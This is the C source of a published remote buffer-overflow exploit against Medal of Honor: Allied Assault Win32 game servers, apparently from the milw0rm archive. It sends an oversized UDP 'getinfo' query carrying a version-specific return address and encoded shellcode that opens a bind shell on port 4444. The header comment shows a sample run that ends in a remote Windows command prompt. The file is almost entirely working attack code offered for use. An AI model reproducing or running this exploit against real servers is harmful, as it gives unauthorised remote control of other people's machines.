/* MOHAA Win32 Server Buffer-Overflow Exploit (getinfo) Written by RunningBon Please use this responsibly, as I am not responsible for any damage you cause by using it. IRC: irc.rizon.net #kik E-mail: runningbon@gmail.com Thanks to: Luigi Auriemma, Metasploit, everyone else (You know who you are.) Example: C:\>MOHAAExploit.exe 192.168.2.44 12203 MOHAA-v1.11 MoHAA Server Buffer overflow exploit Written by RunningBon E-Mail: runningbon@gmail.com IRC: irc.rizon.net #kik Attempting to exploit 192.168.2.44:12203, running version MOHAA-v1.11. Building packet. Sending packet. Packet sent. Check for your shell on port 4444. C:\>telnet 192.168.2.44 4444 Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\Program Files\EA GAMES\MOHAA> */ #include #include struct VersionStruct { char *pName; DWORD dwNewEIP; DWORD dwFillLength; }; VersionStruct Versions[] = { "MOHAA-v1.11", 0xCBB935, 516, "MOHAA:S-v2.15", 0x923575, 516, //Add MOHAA:Breakthrough support }; #pragma comment (lib, "ws2_32.lib") //Port 4444 bindshell unsigned char szShellcode[] = "\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x42" "\xec\xee\x81\x83\xeb\xfc\xe2\xf4\xbe\x86\x05\xcc\xaa\x15\x11\x7e" "\xbd\x8c\x65\xed\x66\xc8\x65\xc4\x7e\x67\x92\x84\x3a\xed\x01\x0a" "\x0d\xf4\x65\xde\x62\xed\x05\xc8\xc9\xd8\x65\x80\xac\xdd\x2e\x18" "\xee\x68\x2e\xf5\x45\x2d\x24\x8c\x43\x2e\x05\x75\x79\xb8\xca\xa9" "\x37\x09\x65\xde\x66\xed\x05\xe7\xc9\xe0\xa5\x0a\x1d\xf0\xef\x6a" "\x41\xc0\x65\x08\x2e\xc8\xf2\xe0\x81\xdd\x35\xe5\xc9\xaf\xde\x0a" "\x02\xe0\x65\xf1\x5e\x41\x65\xc1\x4a\xb2\x86\x0f\x0c\xe2\x02\xd1" "\xbd\x3a\x88\xd2\x24\x84\xdd\xb3\x2a\x9b\x9d\xb3\x1d\xb8\x11\x51" "\x2a\x27\x03\x7d\x79\xbc\x11\x57\x1d\x65\x0b\xe7\xc3\x01\xe6\x83" "\x17\x86\xec\x7e\x92\x84\x37\x88\xb7\x41\xb9\x7e\x94\xbf\xbd\xd2" "\x11\xbf\xad\xd2\x01\xbf\x11\x51\x24\x84\xff\xdd\x24\xbf\x67\x60" "\xd7\x84\x4a\x9b\x32\x2b\xb9\x7e\x94\x86\xfe\xd0\x17\x13\x3e\xe9" "\xe6\x41\xc0\x68\x15\x13\x38\xd2\x17\x13\x3e\xe9\xa7\xa5\x68\xc8" "\x15\x13\x38\xd1\x16\xb8\xbb\x7e\x92\x7f\x86\x66\x3b\x2a\x97\xd6" "\xbd\x3a\xbb\x7e\x92\x8a\x84\xe5\x24\x84\x8d\xec\xcb\x09\x84\xd1" "\x1b\xc5\x22\x08\xa5\x86\xaa\x08\xa0\xdd\x2e\x72\xe8\x12\xac\xac" "\xbc\xae\xc2\x12\xcf\x96\xd6\x2a\xe9\x47\x86\xf3\xbc\x5f\xf8\x7e" "\x37\xa8\x11\x57\x19\xbb\xbc\xd0\x13\xbd\x84\x80\x13\xbd\xbb\xd0" "\xbd\x3c\x86\x2c\x9b\xe9\x20\xd2\xbd\x3a\x84\x7e\xbd\xdb\x11\x51" "\xc9\xbb\x12\x02\x86\x88\x11\x57\x10\x13\x3e\xe9\xb2\x66\xea\xde" "\x11\x13\x38\x7e\x92\xec\xee\x81"; void Error(char *pString) { printf("[ERROR] %s\n", pString); ExitProcess(0); } int Exploit(char *pIP, int iPort, VersionStruct *pVersion) { WSAData WSADATA; SOCKET Socket = NULL; sockaddr_in SockAddr; char szHeader[] = "\xff\xff\xff\xff\x02getinfo "; char szBuffer[4096]; int iLen = 0; WSAStartup(MAKEWORD(1, 1), &WSADATA); if((Socket = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == SOCKET_ERROR) { Error("socket()"); return 0; } SockAddr.sin_addr.s_addr = inet_addr(pIP); SockAddr.sin_port = htons(iPort); SockAddr.sin_family = AF_INET; printf("Building packet.\n"); memset(szBuffer, 0, sizeof(szBuffer)); memcpy(szBuffer, szHeader, sizeof(szHeader) - 1); iLen += sizeof(szHeader) - 1; memset(szBuffer + iLen, 'z', pVersion->dwFillLength); iLen += pVersion->dwFillLength; memcpy(szBuffer + iLen, (LPVOID)&pVersion->dwNewEIP, sizeof(DWORD)); iLen += sizeof(DWORD); memcpy(szBuffer + iLen, szShellcode, sizeof(szShellcode)); iLen += sizeof(szShellcode); printf("Sending packet.\n"); if(sendto(Socket, szBuffer, iLen, 0, (sockaddr*)&SockAddr, sizeof(SockAddr)) == SOCKET_ERROR) { Error("sendto()"); return 0; } printf("Packet sent.\n"); return 1; } void PrintWelcome() { printf( "MoHAA Server Buffer overflow exploit\n" "Written by RunningBon\n" "E-Mail: runningbon@gmail.com\n" "IRC: irc.rizon.net #kik\n" "\n" ); } void PrintUsage(char *pPath) { printf("Usage: %s \n\n", pPath); printf("Supported Version List:\n"); for(int i = 0; i < sizeof(Versions) / sizeof(Versions[0]); i++) { printf("%s\n", Versions[i].pName); } } int main(int argc, char **argv) { VersionStruct *pVersion = NULL; PrintWelcome(); if(argc < 4) { PrintUsage(argv[0]); return 0; } for(int i = 0; i < sizeof(Versions) / sizeof(Versions[0]); i++) { if(!stricmp(argv[3], Versions[i].pName)) { pVersion = &Versions[i]; break; } } if(pVersion == NULL) { Error("Invalid version."); } printf("Attempting to exploit %s:%d, running version %s.\n", argv[1], atoi(argv[2]), pVersion->pName); if(Exploit(argv[1], atoi(argv[2]), pVersion)) { printf("Check for your shell on port 4444.\n"); } return 0; } // milw0rm.com [2006-05-10]